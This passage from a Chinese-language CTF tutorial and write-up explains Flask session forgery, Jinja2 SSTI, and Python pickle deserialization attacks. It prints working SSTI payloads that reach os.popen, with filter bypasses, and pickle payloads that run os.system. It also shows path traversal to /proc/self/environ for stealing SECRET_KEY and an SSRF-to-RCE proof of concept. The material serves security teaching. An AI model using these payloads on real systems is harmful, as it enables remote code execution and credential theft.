''' %(content, session.get('money'))

return render_template_string(template)

@app.route('/sess')

def t():

session['money'] = 100

return '设置金额成功...'

if __name__ == '__main__':

app.debug = True

app.run()

我们可以看到，这里定义了session[money]=100。当我们访问/sess时，服务端就会返回一个jwt给我们，如图：

可以看到session是以jwt来进行存储的，而使用jwt存储是有危害的。

关于jwt的解释：https://www.jianshu.com/p/576dbf44b2ae

只要我们获取SECRET_KEY，那么该JWT是可以进行伪造的。

问题是我们如何进行获取SECRET_KEY？

• 第一种：通过SSTI的{{config}}

如图：

我们可以看到，{{config}}是可以窃取出SECRET_KEY。

• 第二种：通过Linux中的/proc/self/environ

这种姿势我们会在“CTF小结”中的一道叫做“[PASECA2019] honey_shop”的题目所记载。它需要任意文件读取的姿势才可以进行得到SECRET_KEY。

• 第三种：爆破

有一道叫做“[CISCN2019 华北赛区 Day1 Web2]ikun”的题目涉及到了这种姿势，其中又提到了Python反序列化，这里奉上WriteUp：

https://blog.csdn.net/weixin_43345082/article/details/97817909

对于反序列化，笔者会在0x02中进行描述。

我们可以通过flask-session-cookie-manager工具来生成恶意的JWT即可完成身份伪造，工具GitHub：https://github.com/style-404/flask-session-cookie-manager。

首先我们对当前的JWT进行base64解码，如图：

这里可以得出一条json数据过来，那么我们使用flask-session-cookie-manager工具，借助SECRET_KEY来将money篡改为999.

工具使用：python3 flask_session_cookie_manager3.py encode -s "secret_key" -t "json"

修改本地的session值，随后访问/test查看结果。

可以看到成功篡改money的值。

• 基于DEBUG的PIN码攻击

它所利用的条件为 任意文件读取+flask的DEBUG模式。

参考文章：https://xz.aliyun.com/t/2553

这里笔者就不再做演示了。

五：部分CTF题目实例

• Real -> [Flask]SSTI

这道题是比较基础的一道题目，无任何过滤，我们直接进行注入即可。

可以看到表达式被正常解析，那么继续往下操作即可。

构造Payload：

?name={{[].__class__.__base__.__subclasses__()[80].__init__.__globals__['__builtins__']['__import__']('os').popen('ls /').read()}}

命令执行结果如图：

• WEB -> [GYCTF2020]FlaskApp

该题目有两个功能，Base64加密与Base64解密，在Base64解密处存在模板注入。

题目如图:

解密结果：

由此得知存在ssti。

经过测试，得知75存在可利用的function为__init__，如图：

提交后：

但继续往下构造攻击链时，发现过滤了一些敏感关键字，使用open进行读取源码：

源码过滤如图：

我们可以看到万恶的request也被过滤了，但是这里我们可以使用字符拼接来进行绕过，popen可以使用中括号加字符拼接的方式进行调用，那么构造Payload：{{[].__class__.__base__.__subclasses__()[75].__init__.__globals__['__builtins__']['__imp'+'ort__']('o'+'s')['po'+'pen']('ls /').read()}}

编码为base64后提交，查看一下结果：

存在flag关键字，导致我们无法读取，这里我们可以通过命令执行的绕过姿势“\\”来进行绕过，再次构造Payload：

{{[].__class__.__base__.__subclasses__()[75].__init__.__globals__['__builtins__']['__imp'+'ort__']('o'+'s')['po'+'pen']('cat /this_is_the_fl\\ag.txt').read()}}

编码为base64后进行提交：

• WEB -> [CSCCTF 2019 Qual]FlaskLight

打开题目源码发现提示参数 search

那么我们可以通过?search={{2*3}}来查看一下结果。

可以看到6弹我们一脸，那么此处存在ssti。

__subclasses__丢进Burp进行爆破键值，如图：

得出下标为59的__init__魔术方法可以被利用，如图：

构造Payload至__globals__发现被过滤，简单访问一下，真的返回500，如图:

可以使用request.arg.x 来进行绕过，构造Payload：

?search={{[].__class__.__base__.__subclasses__()[59].__init__[request.args.g]['__builtins__']['__import__']('os').popen('ls /flasklight').read()}}&g=__globals__

查看结果：

再次构造Payload读取flag：

?search={{[].__class__.__base__.__subclasses__()[59].__init__[request.args.g]['__builtins__']['__import__']('os').popen('cat /flasklight/coomme_geeeett_youur_flek').read()}}&g=__globals__

如图:

• WEB -> [pasecactf_2019]flask_ssti

查看源代码，发现Ajax请求：

笔者在构造Payload时，发现过滤了 单引号（‘）、点（.），下划线（_），那么我们可以通过双引号来解析变量，并且使用16进制代替下划线即可。

如图：

构造Payload来进行爆破下标：

?nickname={{[]["\x5F\x5Fclass\x5F\x5F"]["\x5F\x5Fbase\x5F\x5F"]["\x5F\x5Fsubclasses\x5F\x5F"]()[§80§]["\x5F\x5Finit\x5F\x5F"]}}

发现下标为91的__init__方法可以被利用，如图:

构造Payload执行命令：

?nickname={{[]["\x5F\x5Fclass\x5F\x5F"]["\x5F\x5Fbase\x5F\x5F"]["\x5F\x5Fsubclasses\x5F\x5F"]()[91]["\x5F\x5Finit\x5F\x5F"]["\x5F\x5Fglobals\x5F\x5F"]["\x5F\x5Fbuiltins\x5F\x5F"]["\x5F\x5Fimport\x5F\x5F"]("os")["popen"]("\x63\x61\x74\x20\x2f\x70\x72\x6f\x63\x2f\x73\x65\x6c\x66\x2f\x63\x77\x64\x2f\x61\x70\x70\x2e\x70\x79")["read"]()}}

其中

\x63\x61\x74\x20\x2f\x70\x72\x6f\x63\x2f\x73\x65\x6c\x66\x2f\x63\x77\x64\x2f\x61\x70\x70\x2e\x70\x79

为 cat /proc/self/cwd/app.py，这里转换可以使用笔者已经写好的脚本：

payload = b'cat /proc/self/cwd/app.py'

string = payload.hex()

result = ''

for i in range(0, len(string), 2):

result += '\\x' + string[i:i+2]

print(result)

结果如图：

可以看到flag文件被os删掉了，但是flag的值被存放于app.config当中，并且经过了encode函数处理，我们可以看一下encode函数的定义：

是使用的异或算法，那么现在我们只需要从config中拿到加密后的flag值，并且将它再次执行一下encode函数即可得到flag。

再次执行函数

则得到flag。

• WEB -> [PASECA2019]honey_shop

该题目属于JWT身份伪造攻击，首先我们打开主页，可以看到金额为1336，如图：

而flag需要1337。

在/download路由下存在文件下载，猜测存在任意文件下载，那么我们下载../../../../../../../../../proc/self/environ来进行观察，如图：

成功下载到并拿到SECRET_KEY，然后我们对当前网址的jwt使用base64进行解密，得出：

伪造为：{"balance":1338,"purchases":[]}，即可购买flag了。

0x02 Python反序列化漏洞利用

原理文章推荐

因为在知乎有位师傅写的非常不错，那么笔者在这里也不去班门弄斧。

传送门：https://zhuanlan.zhihu.com/p/89132768

这里做一下总结，并且对一种利用姿势扩大成果，然后分享一道有意思的例题。

Python反序列化能干什么？

• R指令码的RCE

Python的反序列化比PHP危害更大，可以直接进行RCE。

编写测试脚本：

import pickle, os, base64

class Exp(object):

def __reduce__(self):

return (os.system, ('dir',))

with open('./hacker.txt', 'wb') as fileObj:

pickle.dump(Exp(), fileObj)

会在当前目录生成hacker.txt，内容为序列化的值。如图：

我们再次使用pickle进行反序列化即可执行dir命令。

这里可以看到成功执行了dir命令。

• c指令码的变量获取

当R指令码被禁用后，我们可以采取这种姿势来获取变量。

在当前目录下创建flag.py文件，并且存放一个flag变量，当作模块来进行使用。如图：

编写获取flag变量的脚本：

import flag, pickle

 

class Person():

pass

b = b'\x80\x03c__main__\nPerson\n)\x81}(Vtest\ncflag\nflag\nub.'

print(pickle.loads(b).test)

主要思路为：“cflag\nflag\n“当作test属性的value值压进了前序栈的空dict，随后使用b覆盖了Person类的__dict__成员属性，导致了变量被窃取。

我们可以看到pickle.loads返回的对象下的test就是flag的值，如图：

• c指令码的变量修改

当R指令码被禁用后，并且find_class函数只允许获取__main__中的变量时，我们可以采取这种姿势来修改任意变量。

在原理文章中并没有提到一种姿势，而有一种姿势也是可以进行利用的。我们先按照原理文章来测试一遍。

测试脚本:

import flag, pickle

 

class Person():

pass

b = b'\x80\x03c__main__\nflag\n}(Vflag\nVhacker\nub0c__main__\nPerson\n)\x81}(Va\nVa\nub.'

pickle.loads(b)

print(flag.flag)

主要思路为：使用c将flag模块导入进来，通过ub来更新flag模块的__dict__属性，故可以恶意修改变量的值。

查看结果：

我们可以看到，flag包中的flag变量被成功修改。

那么在反序列化中，一个普通字符串也是可以当作一种数据来进行序列化的，所以这里并不需要Person的类支撑即可完成变量修改。

修改脚本如下：

import flag, pickle

b = b'\x80\x03c__main__\nflag\n}(Vflag\nVhacker\nub0Va\n.'

print(pickle.loads(b))

print(flag.flag)

结果：

那么就成功篡改了flag包中的flag变量的内容。

• __setstate__ 特性 RCE

编写测试脚本：

import flag, pickle

class Person():

pass

 

b = b'\x80\x03c__main__\nobject\n)\x81}(V__setstate__\ncos\nsystem\nubVdir\nb.'

print(pickle.loads(b))

主要思路为：借助于__setstate__的特性造成了RCE。

执行结果：

可以看到成功执行了dir命令。

近看一道ssrf+反序列化+SSTI的例题

这道题是朋友很早之前就留下来的，在网上也找不到现成的反序列化题目，就用它好了。

题目代码是这样的：

from flask import Flask,render_template

from flask import request

import urllib

import sys

import os

import pickle

import ctf_config

from jinja2 import Template

import base64

import io

 

app = Flask(__name__)

class RestrictedUnpickler(pickle.Unpickler):

def find_class(self, module, name):

if module == '__main__':

return getattr(sys.modules['__main__'], name)

raise pickle.UnpicklingError("only __main__")

def get_domain(url):

if url.startswith('http://'):

url = url[7:]

if not url.find("/") == -1:

domain = url[url.find("@")+1:url.index("/",url.find("@"))]

else:

domain = url[url.find("@")+1:]

print(domain)

return domain

else:

return False

@app.route("/", methods=['GET'])

def index():

return render_template("index.html")

@app.route("/get_baidu", methods=['GET'])   # get_baidu?url=http://127.0.0.1:8000/?@www.baidu.com/

def get_baidu():

url = request.args.get("url")

if(url == None):

return "please get url"

if(get_domain(url) == "www.baidu.com"):

content = urllib.request.urlopen(url).read()

return content

else:

return render_template('index.html')

@app.route("/admin", methods=['GET'])

def admin():

data = request.args.get("data")

if(data == None):

return "please get data"

ip = request.remote_addr

if ip != '127.0.0.1':

return redirect('index')

else:

name = base64.b64decode(data)

if b'R' in name:

return "no __reduce__"

name = RestrictedUnpickler(io.BytesIO(name)).load()

if name == "admin":

t = Template("Hello " + name)

else:

t = Template("Hello " + ctf_config.name)

return t.render()

if __name__ == '__main__':

app.debug = False

app.run(host='0.0.0.0', port=8000)

在45行中存在一个判断。

if(get_domain(url) == "www.baidu.com"):

content = urllib.request.urlopen(url).read()

return content

如果进入到该分支则调用至urllib.request.urlopen函数，那么我们看一下get_domain方法是逻辑是怎么样的。

在27行中出现了漏洞问题，如果url中存在“/”，则返回@符号往后的内容，那么这里存在一个伪造的情况，例如：http://127.0.0.1:3306/?@www.baidu.com/，

则会匹配到www.baidu.com/，但是实际发送出的HTTP请求还是发送至127.0.0.1身上，所以说这里存在一个SSRF漏洞问题。

而在51-68行中确实验证了访问者的IP（这里可以使用SSRF进行绕过），如图：

61行禁用了R指令，则表示不可以使用__reduce__进行命令执行操作，可以看到63行实例化了RestrictedUnpickler类，而该类则继承了pickle.Unpickler类，如图：

同时重写了find_class的方法，这时c指令只可以进行导入本地模块。而类名中存在“R关键字”，则无法进行__setstate__姿势的RCE，这里利用方式只剩下一种：c指令码的变量修改。

但是变量修改有什么用呢？我们可以注意到第67行的ctf_config包下的name变量，如图：

直接将变量的值拼接到Template方法中，这里存在一个SSTI注入问题。

那么思路就有了：通过get_data路由发送SSRF请求->admin路由接收进行反序列化->修改ctf_config下的name属性为SSTI注入语句->实现RCE。

那么编写POC脚本：

import base64

ssti = b'2*6'

payload = b'\x80\x03c__main__\nctf_config\n}(Vname\nV{{' + ssti + b'}}\nub0V123\n.'

 

payload = base64.b64encode(payload).decode('utf-8')

print(payload)

传递Payload：

http://127.0.0.1:8000/get_baidu?url=http://127.0.0.1:8000/admin?data=SSTI的值%26@www.baidu.com/

如图：

成功进行SSTI注入，笔者发现__subclasses__()的第81下标存在可利用的function，那么这里直接执行whoami：

可以看到成功执行了“whoami”。

0x03 尾巴

无聊的话，就一起来玩会Python吧。